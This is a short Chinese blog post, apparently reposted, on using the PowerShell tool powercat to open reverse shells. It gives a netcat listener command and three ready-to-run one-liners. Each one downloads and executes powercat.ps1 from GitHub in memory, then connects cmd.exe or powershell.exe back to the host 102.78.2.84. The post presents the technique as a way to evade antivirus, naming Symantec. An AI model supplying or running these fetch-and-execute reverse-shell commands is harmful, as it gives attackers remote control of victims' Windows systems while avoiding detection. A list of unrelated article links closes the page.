利用powercat反弹shell

powercat是一个PowerShell版的netcat，可用于反弹shell、传输文件等。GitHub项目地址：https://github.com/besimorhino/powercat

使用powercat反弹shell无需将exe文件下载到服务器上，直接通过http请求加载PowerShell脚本，能有效绕过杀毒软件的查杀。

第1步：在VPS上监听443端口

netcat -l -p 443

第2步：反弹shell

# 反弹cmd shell
powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 102.78.2.84 -p 443 -e cmd.exe

# 反弹PowerShell shell
powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 102.78.2.84 -p 443 -e powershell.exe

# 反弹PowerShell shell，此方法可以绕过某些杀毒软件，如：赛门铁克
powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 102.78.2.84 -p 80 -ep

查看全文

相关阅读:
常用控件的学习
 C# NOSQL 开源项目
 Js生成Guid
通过sql语句附加数据库与启用sa账户
 Js 键值对实现
 sqlServer2000 安装备忘
 System.Reflection.ReflectionTypeLoadException: 无法加载一个或多个请求的类型。有关更多信息，请检索 LoaderExceptions 属性。
关于ado.net连接池的一些分享（2）（原文出自：http://www.cnblogs.com/b42259626/articles/968460.html）
关于ado.net连接池的一些分享（原文出自：http://www.cnblogs.com/rickie/archive/2004/10/02/48546.aspx）
删除迅雷文件夹

原文地址：https://www.cnblogs.com/dgjnszf/p/11428007.html